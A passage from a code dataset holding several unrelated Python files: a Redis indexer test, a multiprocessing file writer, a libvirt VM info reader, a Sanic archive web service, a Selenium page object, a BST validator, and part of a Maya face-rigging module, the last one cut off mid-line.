+{"seq_id":"369568738","text":"import unittest\nimport redis\n\nfrom functions.bit_indexer import BitIndexer, BitDocument\nfrom functions.tokenizer import TermCountTokenizer\n\n\nclass TestBitIndexer(unittest.TestCase):\n \"\"\"Integration test validating BitIndexer functionaltiy. Requires \n local redis server, specifically at: localhost:6379\n \"\"\"\n rdb = redis.Redis(host='localhost', port=6379, decode_responses=True)\n tokenizer = TermCountTokenizer()\n bit_indexer = BitIndexer(tokenizer=tokenizer, redisdb=rdb)\n\n def setUp(self) -> None:\n # clear redis before each test\n self.rdb.flushall()\n\n def _create_bit_document(self, id, title, content, tags):\n return BitDocument(dict(\n id={'stringValue': id},\n title={'stringValue': title},\n content={'stringValue': content},\n tags={'arrayValue': {'values': [{'stringValue': tag} for tag in tags]}}\n ))\n\n def test_should_add_bit_to_index(self):\n assert self.rdb.keys('*') == []\n bit_doc = self._create_bit_document(\n id='bit1', \n title='What is redis', \n content='Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache, and message broker.',\n tags=['redis', 'database', 'cache'])\n \n self.bit_indexer.add(bit_doc)\n tokens = self.tokenizer.tokenize(bit_doc.as_indexable_str())\n terms = self.rdb.keys('_*')\n for term in terms:\n assert str(term[1:]) in tokens\n \n def test_should_add_multiple_bits_to_index_with_correct_count(self):\n bit_doc1 = self._create_bit_document(\n id='bit1', \n title='What is redis', \n content='Redis is an open source in-memory data structure store',\n tags=['redis', 'database', 'cache'])\n bit_doc2 = self._create_bit_document(\n id='bit2',\n title='Continue, what is redis',\n content=', used as a database, cache, and message broker.',\n tags=['nosql', 'redis'])\n bit_doc3 = self._create_bit_document(\n id='bit3',\n title='what is redis, part 3',\n content='Redis provides data structures such as strings, hashes, lists, sets, sorted sets with range queries, bitmaps, hyperloglogs, geospatial indexes, and streams',\n tags=['datastructures', 'hashes', 'redis', 'nosql']\n )\n\n assert self.rdb.keys('*') == []\n\n self.bit_indexer.add(bit_doc1)\n self.bit_indexer.add(bit_doc2)\n self.bit_indexer.add(bit_doc3)\n\n # Each bit doc should have the term \"redis\" \n terms = self.rdb.zrange('_redis', 0, 10, withscores=True)\n for term_cnt in [('bit1', -3), ('bit3', -3), ('bit2', -2)]:\n assert term_cnt in terms\n\n # bit3 is only bit with term datastructures\n assert ('bit3', -1) in self.rdb.zrange('_datastructures', 0, 10, withscores=True)\n\n def test_should_delete_a_bit_from_index(self):\n bit_doc = self._create_bit_document(\n id='bit1', \n title='What is redis', \n content='Redis is an open source in-memory data structure store',\n tags=['redis', 'database', 'cache'])\n\n self.bit_indexer.add(bit_doc)\n assert self.rdb.keys('*') != []\n self.bit_indexer.delete(bit_doc)\n assert self.rdb.keys('*') == []\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/functions/test_bit_indexer.py","file_name":"test_bit_indexer.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"73433289","text":"# -*- coding:utf-8 -*-\nfrom multiprocessing import Process, Pool\nimport os\nimport time\n\nfList = []\nnum_worker_threads = 10\n\n# macBook Air上5个文件平均写入速度约14M/s,\n# macBook Air上10个文件平均写入速度约14M/s\n\ndef run_proc(processId):\n for i in range(10000000):\n fList[processId].write(str(i) + \"\\n\")\n\nfor i in range(num_worker_threads):\n f = open(os.path.join(\"res\", str(i)), 'w+')\n fList.append(f)\n\nfor i in range(num_worker_threads):\n p = Process(target=run_proc, args=(i,))\n p.start()","sub_path":"basic/languages/python-19910220/lib-ref/11-file-dir-access/write_file4.py","file_name":"write_file4.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"350800556","text":"def get_vm_hostnames():\n ns = {'url': 'http://openstack.org/xmlns/libvirt/nova/1.0'}\n conn = libvirt.open('qemu:///system')\n if conn == None:\n print('Failed to open connection to qemu:///system')\n exit(1)\n index = 0\n vms = {}\n for i in conn.listAllDomains():\n vms[index] = {}\n raw_xml = i.XMLDesc(0)\n root = ET.fromstring(raw_xml)\n for child in root.findall('metadata'):\n for c in child.findall('url:instance', ns):\n for cc in c:\n if cc.tag == '{%s}name' % ns['url']:\n vms[index]['hostname'] = cc.text\n if cc.tag == '{%s}creationTime' % ns['url']:\n vms[index]['creationTime'] = cc.text\n if cc.tag == '{%s}flavor' % ns['url']:\n vms[index]['flavor'] = cc.attrib['name']\n if cc.tag == '{%s}owner' % ns['url']:\n vms[index]['owner'] = cc.find('url:user', ns).text\n if cc.tag == '{%s}owner' % ns['url']:\n vms[index]['project'] = cc.find('url:project', ns).text\n index = index + 1\n output = ''\n for v in vms:\n output = output + \"instance_%s.hostname=%s \" % (v, vms[v]['hostname'])\n output = output + \"instance_%s.creationTime=%s \" % (v, '-'.join(\n vms[v]['creationTime'].split()))\n output = output + \"instance_%s.flavor=%s \" % (v, vms[v]['flavor'])\n output = output + \"instance_%s.owner=%s \" % (v, vms[v]['owner'])\n output = output + \"instance_%s.project=%s \" % (v, vms[v]['project'])\n return output\n","sub_path":"modules/libvirt/retrieve-vm-info.py","file_name":"retrieve-vm-info.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"53406204","text":"import os, re\nfrom datetime import datetime\nimport argparse\nfrom functools import wraps\nimport base64\n\nfrom sanic import Sanic\nfrom sanic import response\nfrom sanic_auth import Auth, User\nfrom sanic_token_auth import SanicTokenAuth\nfrom tinydb import TinyDB, Query\n\nfrom schema import ArchivePostSchema\nfrom name_generator import ArchiveName\nfrom lemmiwinks_top import ArchiveServiceLemmiwinks\nfrom utilities import Archives\n\n# Sanic init\napp = Sanic()\n\n# Sanic-auth\napp.config.AUTH_LOGIN_ENDPOINT = 'login'\nauth = Auth(app)\n\nsession = {}\n@app.middleware('request')\nasync def add_session(request):\n request['session'] = session\n\ndb = TinyDB('db/login_access')\n\n# API auth\ndef api_auth_required():\n def decorator(f):\n @wraps(f)\n async def privileged(request, *args, **kwargs):\n # Authorization Basic\n if request.token == None:\n # no auth header\n return response.json(None, 401)\n\n try:\n print(request.token)\n _, auth_token = request.token.split(' ')\n decoded = base64.b64decode(auth_token).decode(\"utf-8\")\n username, password = decoded.split(\":\")\n except Exception:\n # bad token\n return response.json(None, 401)\n\n q = Query()\n result = next(iter(\n db.search((q.username == username) & (q.password == password))\n ), None)\n if result:\n # the user is authorized.\n return await f(request, *args, **kwargs)\n else:\n # incorrect user\n return response.json(None, 401)\n return privileged\n return decorator\n\n# Sanic routes\n@app.route('/', methods=['GET'])\nasync def get_index(request):\n \"\"\"get_index\n\n Main page containing basic information and navigation.\n\n :rtype: str\n \"\"\"\n with open(\"www/index.html\", \"r\", encoding='utf-8') as f:\n index = f.read()\n with open(\"www/style.css\", \"r\", encoding='utf-8') as f:\n style = f.read()\n\n if auth.current_user(request):\n with open(\"www/index_user.html\", \"r\", encoding='utf-8') as f:\n index_user = f.read()\n return response.html(index.format(style, index_user))\n else:\n # show login to guest\n with open(\"www/index_guest.html\", \"r\", encoding='utf-8') as f:\n index_guest = f.read()\n return response.html(index.format(style, index_guest))\n\n\n@app.route('/login', methods=['GET'])\nasync def login(request):\n \"\"\"Login HTML page\n\n Login page with login form.\n \"\"\"\n with open(\"www/style.css\", \"r\", encoding='utf-8') as f:\n style = f.read()\n if auth.current_user(request):\n return response.redirect('/')\n else:\n with open(\"www/login.html\", \"r\", encoding='utf-8') as f:\n login = f.read()\n return response.html(login.format(style, ''))\n\n@app.route('/login', methods=['POST'])\nasync def login(request):\n \"\"\"Authenticate a user\n\n Checks and authenticates a user and saves into session. \n Redirects to the main page on corrent login,\n else displays error message.\n \"\"\"\n\n username = request.form.get('username')\n password = request.form.get('password')\n\n with open(\"www/login.html\", \"r\", encoding='utf-8') as f:\n login = f.read()\n with open(\"www/style.css\", \"r\", encoding='utf-8') as f:\n style = f.read()\n\n q = Query()\n result = next(iter(\n db.search((q.username == username) & (q.password == password))\n ), None)\n if result:\n user = User(id=result.get('id'),name=username)\n auth.login_user(request, user)\n return response.redirect('/')\n else:\n msg_bad_login = 'Incorrect username or password'\n return response.html(login.format(style, msg_bad_login))\n\n@app.route('/logout', methods=['GET'])\n@auth.login_required\nasync def logout(request):\n \"\"\"Logout current user\n\n Logout user in this session and redirect to main page.\n \"\"\"\n\n auth.logout_user(request)\n return response.redirect('/')\n\n@app.route('/archives', methods=['GET'])\n@auth.login_required\nasync def get_archives(request):\n \"\"\"Archives collection.\n\n Gets HTML page with a list of all archives and a POST form for creating\n a new archive from given URL and options.\n\n :rtype: str\n \"\"\"\n\n with open(\"www/archives.html\", \"r\", encoding='utf-8') as f:\n html = f.read()\n with open(\"www/style.css\", \"r\", encoding='utf-8') as f:\n style = f.read()\n\n msg = ''\n html_archive_list = ''\n archives = Archives()\n for detail in archives.details():\n html_archive_list += '
    '.format(\n detail['href_detail'], detail['name'], detail['aid'], detail['ctime'], detail['size']\n )\n\n return response.html(html.format(style, html_archive_list, msg))\n\n@app.route('/archives', methods=['POST'])\n@auth.login_required\nasync def post_archives(request):\n \"\"\"Posts form data for a new archive creation\n\n A new archive will be created from given URLs. The view will\n be updated with a status message.\n\n :rtype: str\n \"\"\"\n print(request.form.get('forceTor'))\n if request.form.get('forceTor'):\n _forceTor = True\n else:\n _forceTor = False\n\n archive_data = {\n \"urls\" : [ request.form.get('url') ],\n \"name\" : request.form.get('name'),\n \"forceTor\" : _forceTor,\n \"headers\" : {}\n }\n if ArchivePostSchema(archive_data).is_valid():\n archive_name = ArchiveName(name=archive_data['name'], urls=archive_data['urls'])\n if 'args' in globals():\n aio_archive = ArchiveServiceLemmiwinks(archive_data=archive_data, \n archive_name=archive_name.full_name,\n download_service_url=args.download_service_url)\n else:\n aio_archive = ArchiveServiceLemmiwinks(archive_data=archive_data, \n archive_name=archive_name.full_name,\n download_service_url='http://0.0.0.0:8081')\n await aio_archive.task_executor()\n msg = 'Archive {} created.'.format(archive_name)\n status = 201\n else:\n msg = 'Incorrect form request.'\n status = 400\n\n with open(\"www/archives.html\", \"r\", encoding='utf-8') as f:\n html = f.read()\n with open(\"www/style.css\", \"r\", encoding='utf-8') as f:\n style = f.read()\n\n html_archive_list = ''\n archives = Archives()\n for detail in archives.details():\n html_archive_list += ''.format(\n detail['href_detail'], detail['name'], detail['aid'], detail['ctime'], detail['size']\n )\n\n return response.html(html.format(style, html_archive_list, msg), status=status)\n\n\n@app.route('/archives/', methods=['GET'])\n@auth.login_required\nasync def get_archive_item(request, id):\n \"\"\"Archive item details\n\n Gets HTML page with archive given by its ID. Contains file download link.\n\n :param id: \n :type id: int\n\n :rtype: str\n \"\"\"\n with open(\"www/style.css\", \"r\", encoding='utf-8') as f:\n style = f.read()\n archives = Archives()\n detail = archives.searchById(id)\n if detail:\n with open(\"www/archiveDetail.html\", \"r\", encoding='utf-8') as f:\n html = f.read()\n html = html.format(style, detail['name'], detail['file'], detail['aid'], detail['ctime'], detail['size'], detail['href_download'])\n return response.html(html)\n else:\n with open(\"www/notfound.html\", \"r\", encoding='utf-8') as f:\n html = f.read()\n html = html.format(id)\n return response.html(html, status=404)\n\n \n@app.route('/archives//', methods=['GET'])\n@auth.login_required\nasync def get_archive_file(request, id, filename):\n \"\"\"Downloads the archive\n\n Downloads the archive given by its ID. \n\n :param id: \n :type id: int\n :param filename: \n :type filename: string\n\n :rtype: str\n \"\"\"\n\n archives = Archives()\n detail = archives.searchById(id)\n if detail and detail['file'] == filename:\n return await response.file_stream(filename, headers={\"Content-Type\" : \"application/x-maff\"})\n else:\n with open(\"www/notfound.html\", \"r\", encoding='utf-8') as f:\n html = f.read() \n return response.html(html.format(filename), status=404)\n\n\n# API routes\n\n@app.route('/api/archives', methods=['GET'])\n@api_auth_required()\nasync def api_get_archives(request):\n \"\"\"Archives collection.\n\n Gets JSON collection of all archives. Use query params.\n\n :rtype: json\n \"\"\"\n\n archives = Archives()\n # query string parse\n try:\n search_name = request.args['name'][0]\n except KeyError:\n search_name = ''\n try:\n skip = int(request.args['skip'][0])\n except KeyError:\n skip = 0\n try:\n limit = int(request.args['limit'][0])\n except KeyError:\n limit = 50\n\n details = archives.searchByName(search_name)\n details = details[skip:skip+limit]\n\n return response.json(details)\n\n@app.route('/api/archives', methods=['POST'])\n@api_auth_required()\nasync def api_post_archives(request):\n \"\"\"Posts data for new archive creation\n\n A new archive will be created from given URLs. On success\n the archive reference will be in the location response header.\n\n :rtype: json\n \"\"\"\n if ArchivePostSchema(request.json).is_valid():\n archive_data = {\n \"urls\" : request.json.get('urls'),\n \"name\" : request.json.get('name'),\n \"forceTor\" : request.json.get('forceTor'),\n \"headers\" : request.json.get('headers')\n }\n archive_name = ArchiveName(name=archive_data['name'], urls=archive_data['urls'])\n\n if 'args' in globals():\n aio_archive = ArchiveServiceLemmiwinks(archive_data=archive_data, \n archive_name=archive_name.full_name,\n download_service_url=args.download_service_url)\n else:\n aio_archive = ArchiveServiceLemmiwinks(archive_data=archive_data, \n archive_name=archive_name.full_name,\n download_service_url='http://0.0.0.0:8081')\n\n try:\n await aio_archive.task_executor()\n except Exception as e:\n # something went wrong, archive not created\n print(e)\n return response.json(None, status=204)\n else:\n return response.json(None, status=201, headers={'Location': archive_name.href_detail_api})\n else:\n # bad request\n return response.json(None, status=400)\n \n@app.route('/api/archives/', methods=['GET'])\n@api_auth_required()\nasync def api_get_archive_item(request, id):\n \"\"\"Gets archive item details\n\n Gets JSON representation of archive item given by id.\n\n :param id: \n :type id: int\n\n :rtype: json\n \"\"\"\n\n archives = Archives()\n detail = archives.searchById(id)\n if detail:\n return response.json(detail)\n else:\n return response.json(None, status=404)\n\n@app.route('/api/archives/', methods=['DELETE'])\n@api_auth_required()\nasync def api_delete_archive_item(request, id):\n \"\"\"Deletes the archive\n\n Deletes the archive given by its ID. \n\n :param id: \n :type id: int\n\n :rtype: str\n \"\"\"\n\n archives = Archives()\n detail = archives.searchById(id)\n if detail:\n os.remove(detail['file'])\n return response.json(None, status=204)\n\n@app.route('/api/archives//', methods=['GET'])\n@api_auth_required()\nasync def api_get_archive_file(request, id, filename):\n \"\"\"Downloads the archive\n\n Downloads the archive file given by its ID and filename. \n\n :param id: \n :type id: int\n :param filename: \n :type filename: string\n\n :rtype: str\n \"\"\"\n\n archives = Archives()\n detail = archives.searchById(id)\n if detail and detail['file'] == filename:\n return await response.file_stream(filename, headers={\"Content-Type\" : \"application/x-maff\"})\n else:\n return response.json(None, status=404)\n\n\n# parse command line arguments and run Sanic server\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Start the archive service')\n parser.add_argument('--download_service_url', type=str, default='http://0.0.0.0:8081',\n help='Download service URL to be used by this service')\n args = parser.parse_args()\n\n app.run(host=\"0.0.0.0\", port=\"8080\")\n\n\n","sub_path":"archive_service/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":12627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"641158709","text":"import time\n\n\nclass ASModel:\n as_sidebar = {'selector': 'div[class=\"as-buttons\"]', 'selector_type': 'css'}\n accounting_tab = {'selector': '//span[contains(text(),\"Accounting\")]', 'selector_type': 'xpath'}\n create_transaction_tab = {'selector': '//span[contains(text(),\"Create transaction\")]', 'selector_type': 'xpath'}\n transactions_tab = {'selector': '//span[contains(text(),\"Transactions\")]', 'selector_type': 'xpath'}\n reports_tab = {'selector': '//span[contains(text(),\"Reports\")]', 'selector_type': 'xpath'}\n burger_button = {'selector': 'button.menu-icon>span>i', 'selector_type': 'css'}\n accounting_table = {'selector': 'table.accounting--table', 'selector_type': 'css'}\n accounting_user_select = {'selector': 'input[id^=\"input\"]', 'selector_type': 'css'}\n general_input = {'selector': '[id^=\"input\"]', 'selector_type': 'css'}\n transaction_type = {'selector': '//div[@class=\"v-list-item__content\"]/div[text()=\"{}\"]', 'selector_type': 'xpath'}\n\n def __init__(self, webdriver):\n self.webdriver = webdriver\n\n def click_accounting_tab(self, button_name):\n for i in range(2):\n self.webdriver.move_to_element(**self.as_sidebar)\n self.webdriver.click_with_wait(**getattr(self, button_name))\n # time.sleep(5)\n\n # self.webdriver.click(**{'selector': 'i.mdi-view-split-horizontal', 'selector_type': 'css'})\n # self.webdriver.move_to_element(**self.burger_button)\n\n def get_create_transactions_inputs(self):\n inputs_names_list = [\n 'effective_date',\n 'transaction_type',\n 'affected_user',\n 'from_account',\n 'to_account',\n 'amount',\n 'currency',\n 'approver',\n 'comment',\n ]\n elements = self.webdriver.get_elements(**self.general_input)\n\n inputs_names_dict = {}\n for index, element in enumerate(elements):\n inputs_names_dict[inputs_names_list[index]] = element\n\n return inputs_names_dict\n\n def choose_transaction_type(self, transaction_type, element):\n self.webdriver.click_with_wait(element=self.webdriver.get_element(selector='..', element=element))\n self.webdriver.click_with_wait(\n selector=self.transaction_type['selector'].format(transaction_type),\n selector_type=self.transaction_type['selector_type']\n )\n\n def write_data(self, text, element):\n self.webdriver.click_with_wait(element=self.webdriver.get_element(selector='..', element=element))\n self.webdriver.input_text(text=text, element=element)\n\n def write_data_and_select(self, text, element):\n self.webdriver.click_with_wait(element=self.webdriver.get_element(selector='..', element=element))\n self.webdriver.input_text(text=text, element=element)\n self.webdriver.click_with_wait(selector=f'//span[contains(text(),\"{text}\")]')\n\n def select_data(self, text, element):\n self.webdriver.click_with_wait(element=self.webdriver.get_element(selector='..', element=element))\n self.webdriver.click_with_wait(selector=f'//div[text()=\"{text}\"]')\n\n def multiple_select(self, managers, amount):\n qty_row = len(self.webdriver.get_elements(\n selector='form > div.ps.ps--active-y > div',\n selector_type='css')\n )\n for row_number in range(1, qty_row - 1):\n row = self.webdriver.get_element(\n selector=f'form > div.ps.ps--active-y > div:nth-child({row_number})',\n selector_type='css'\n )\n user_input = self.webdriver.get_element(selector=f'input[type=\"text\"]', selector_type='css', element=row)\n user = self.webdriver.get_atribute(element=user_input, attribute='value')\n if (managers[0] in user) or (managers[1] in user):\n amount_input = self.webdriver.get_element(selector=f'input[type=\"number\"]', selector_type='css', element=row)\n self.webdriver.input_text(text=amount, element=amount_input)\n","sub_path":"page_object_models/as_model.py","file_name":"as_model.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"114227816","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def isValidBST(self, root: TreeNode) -> bool:\n return self.helper(root, float(\"-inf\"), float(\"inf\"))\n \n def helper(self, node, minimum, maximum):\n if node is None:\n return True\n \n if node.val <= minimum or node.val >= maximum:\n return False\n \n leftValid = self.helper(node.left, minimum, node.val)\n rightValid = self.helper(node.right, node.val, maximum)\n \n return leftValid and rightValid\n","sub_path":"bst/validate-bst.py","file_name":"validate-bst.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"488965559","text":"from __future__ import absolute_import\n\nimport maya.cmds as cmds\n\nfrom rigging.library.utils import controller as rlu_controller, transform as rlu_transform, core as rlu_core\nfrom rigging.tools import utils as rt_utils\n\n\nclass Build:\n def __init__(self, curve_template, scale, side_LFT, side_RGT, side, offset_jnt02_bind_position,\n offset_jnt04_bind_position,\n ctrl01_direction, ctrl02_direction, ctrl03_direction, ctrl04_direction, ctrl05_direction,\n ctrl_color, wire_low_controller, shape, position_joint_direction, face_utils_grp, suffix_controller,\n base_module_nonTransform, game_bind_joint, parent_sgame_joint,\n connect_with_corner_ctrl=False):\n\n # DUPLICATE CURVE THEN RENAME\n curve_new = rt_utils.obj_duplicate_then_rename(obj_duplicate=curve_template, suffix='crv')[1]\n curve = curve_new[0]\n cmds.parent(curve, base_module_nonTransform)\n\n self.prefix_name_crv = rlu_transform.reposition_side(rt_utils.prefix_name(curve), side_LFT=side_LFT,\n side_RGT=side_RGT)\n\n self.position_jnt_direction = cmds.xform(position_joint_direction, q=1, ws=1, t=1)[0]\n\n self.curve_vertex = cmds.ls('%s.cv[0:*]' % curve, fl=True)\n\n self.create_joint_wire(curve=curve, scale=scale, side=side, game_bind_joint=game_bind_joint,\n parent_sgame_joint=parent_sgame_joint)\n\n self.wire_bind_curve(offset_jnt02_bind_position=offset_jnt02_bind_position, ctrl01_direction=ctrl01_direction,\n ctrl02_direction=ctrl02_direction, offset_jnt04_bind_position=offset_jnt04_bind_position,\n ctrl03_direction=ctrl03_direction, ctrl04_direction=ctrl04_direction,\n ctrl05_direction=ctrl05_direction, curve=curve, scale=scale, side=side)\n\n self.controller_wire(scale=scale, side=side, controller_wire_low=wire_low_controller, shape=shape,\n ctrl_color=ctrl_color,\n connect_with_corner_ctrl=connect_with_corner_ctrl, side_RGT=side_RGT, side_LFT=side_LFT,\n suffix_controller=suffix_controller)\n\n self.grouping_wire(side=side, face_utils_grp=face_utils_grp, position_direction_jnt=position_joint_direction)\n\n self.curve = curve\n\n def grouping_wire(self, side, face_utils_grp, position_direction_jnt):\n setup_driver_grp = cmds.group(em=1, n=self.prefix_name_crv + 'Setup' + side + '_grp')\n ctrl_driver_grp = cmds.group(em=1, n=self.prefix_name_crv + 'Controller' + side + '_grp')\n\n cmds.hide(setup_driver_grp)\n all_grp = cmds.group(em=1, n=self.prefix_name_crv + side + '_grp')\n\n wire_driven_jnt_grp = cmds.group(em=1, n=self.prefix_name_crv + 'DrivenJnt' + side + '_grp')\n cmds.delete(cmds.parentConstraint(position_direction_jnt, wire_driven_jnt_grp))\n wire_driven_jnt_grp_offset = \\\n cmds.duplicate(wire_driven_jnt_grp, n=self.prefix_name_crv + 'DrivenOffsetJnt' + side + '_grp')[0]\n wire_driven_ctrl_grp = \\\n cmds.duplicate(wire_driven_jnt_grp, n=self.prefix_name_crv + 'DrivenCtrl' + side + '_grp')[0]\n wire_driven_ctrl_grp_offset = \\\n cmds.duplicate(wire_driven_ctrl_grp, n=self.prefix_name_crv + 'DrivenOffsetCtrl' + side + '_grp')[0]\n\n # parenting to joint grp\n cmds.parent(wire_driven_jnt_grp_offset, wire_driven_jnt_grp)\n cmds.parent(wire_driven_ctrl_grp_offset, wire_driven_ctrl_grp)\n\n cmds.parent(wire_driven_jnt_grp, setup_driver_grp, all_grp)\n cmds.parent(wire_driven_ctrl_grp, ctrl_driver_grp)\n\n cmds.parent(all_grp, face_utils_grp)\n\n self.wire_driven_jnt_grp_offset = wire_driven_jnt_grp_offset\n self.wire_driven_ctrl_grp = wire_driven_ctrl_grp\n self.wire_driven_ctrl_grp_offset = wire_driven_ctrl_grp_offset\n self.setup_driver_grp = setup_driver_grp\n self.ctrl_driver_grp = ctrl_driver_grp\n\n cmds.parent(self.drive_ctrl_grp, wire_driven_ctrl_grp_offset)\n cmds.parent(self.joint_grp, setup_driver_grp)\n cmds.parent(self.bind_jnt_grp, wire_driven_jnt_grp_offset)\n\n cmds.parent(self.curves_grp, self.locator_grp, self.setup_driver_grp)\n\n def controller_wire(self, scale, ctrl_color, shape, controller_wire_low, suffix_controller,\n side_RGT, side_LFT, side='', connect_with_corner_ctrl=False):\n\n # controller mid\n controller_bind03 = rlu_controller.Control(match_obj_first_position=self.jnt03,\n prefix=self.prefix_name_crv + 'Drv03',\n shape=shape, groups_ctrl=['Zro', 'Offset'], ctrl_size=scale * 0.075,\n ctrl_color=ctrl_color, lock_channels=['v', 's'], side=side,\n suffix=suffix_controller\n )\n\n # controller rgt 01\n controller_bind05 = rlu_controller.Control(match_obj_first_position=self.jnt05,\n prefix=self.prefix_name_crv + 'Drv05',\n shape=shape, groups_ctrl=['Zro', 'Offset', 'All'],\n ctrl_size=scale * 0.035,\n ctrl_color=ctrl_color, lock_channels=['v', 's'], side=side,\n suffix=suffix_controller\n )\n\n # controller rgt 02\n controller_bind04 = rlu_controller.Control(match_obj_first_position=self.jnt04,\n prefix=self.prefix_name_crv + 'Drv04',\n shape=shape, groups_ctrl=['Zro', 'Offset'], ctrl_size=scale * 0.05,\n ctrl_color=ctrl_color, lock_channels=['v', 's'], side=side,\n suffix=suffix_controller\n )\n # controller lft 01\n controller_bind01 = rlu_controller.Control(match_obj_first_position=self.jnt01,\n prefix=self.prefix_name_crv + 'Drv01',\n shape=shape, groups_ctrl=['Zro', 'Offset', 'All'],\n ctrl_size=scale * 0.035,\n ctrl_color=ctrl_color, lock_channels=['v', 's'], side=side,\n suffix=suffix_controller\n )\n # controller lft 02\n controller_bind02 = rlu_controller.Control(match_obj_first_position=self.jnt02,\n prefix=self.prefix_name_crv + 'Drv02',\n shape=shape, groups_ctrl=['Zro', 'Offset'], ctrl_size=scale * 0.05,\n ctrl_color=ctrl_color, lock_channels=['v', 's'], side=side,\n suffix=suffix_controller\n )\n\n # create grp controller and parent into it\n drive_ctrl_grp = cmds.createNode('transform', n=self.prefix_name_crv + 'Ctrl' + side + '_grp')\n cmds.parent(controller_bind03.parent_control[0], controller_bind05.parent_control[0],\n controller_bind04.parent_control[0],\n controller_bind01.parent_control[0], controller_bind02.parent_control[0], drive_ctrl_grp)\n\n # connect group parent bind joint 01 and 02 to the controller grp parent 01 and 02\n rt_utils.connect_attr_translate_rotate(self.joint_bind04_grp, controller_bind04.parent_control[0])\n rt_utils.connect_attr_translate_rotate(self.joint_bind02_grp, controller_bind02.parent_control[0])\n\n # connect bind parent zro to ctrl zro parent\n if not connect_with_corner_ctrl:\n rt_utils.connect_attr_translate(self.joint_bind05_grp, controller_bind05.parent_control[0])\n rt_utils.connect_attr_translate(self.joint_bind01_grp, controller_bind01.parent_control[0])\n\n # flipping controller\n if controller_wire_low:\n if self.position_jnt_direction >= 0:\n # LOW LID LFT\n cmds.setAttr(controller_bind01.parent_control[1] + '.scaleX', -1)\n cmds.setAttr(controller_bind02.parent_control[1] + '.scaleX', -1)\n cmds.setAttr(controller_bind04.parent_control[1] + '.scaleX', 1)\n cmds.setAttr(controller_bind05.parent_control[1] + '.scaleX', 1)\n\n # connect translate controller to joint\n # right side 01 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind01.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt01, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind01.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt01, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # right side 02 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind02.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt02, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind02.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt02, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # left side 04 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind04.control,\n input_2X=1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt04, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind04.control,\n input_2X=-1, input_2Y=1, input_2Z=-1,\n joint_bind_target=self.jnt04, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # left side 05 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind05.control,\n input_2X=1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt05, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind05.control,\n input_2X=-1, input_2Y=1, input_2Z=-1,\n joint_bind_target=self.jnt05, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n else:\n # LOW LID RGT\n cmds.setAttr(controller_bind01.parent_control[1] + '.scaleX', 1)\n cmds.setAttr(controller_bind02.parent_control[1] + '.scaleX', 1)\n cmds.setAttr(controller_bind04.parent_control[1] + '.scaleX', -1)\n cmds.setAttr(controller_bind05.parent_control[1] + '.scaleX', -1)\n # connect translate controller to joint\n # right side 01 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind01.control,\n input_2X=1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt01, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind01.control,\n input_2X=-1, input_2Y=1, input_2Z=-1,\n joint_bind_target=self.jnt01, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # right side 02 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind02.control,\n input_2X=1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt02, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind02.control,\n input_2X=-1, input_2Y=1, input_2Z=-1,\n joint_bind_target=self.jnt02, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # left side 04 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind04.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt04, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind04.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt04, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # left side 05 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind05.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt05, 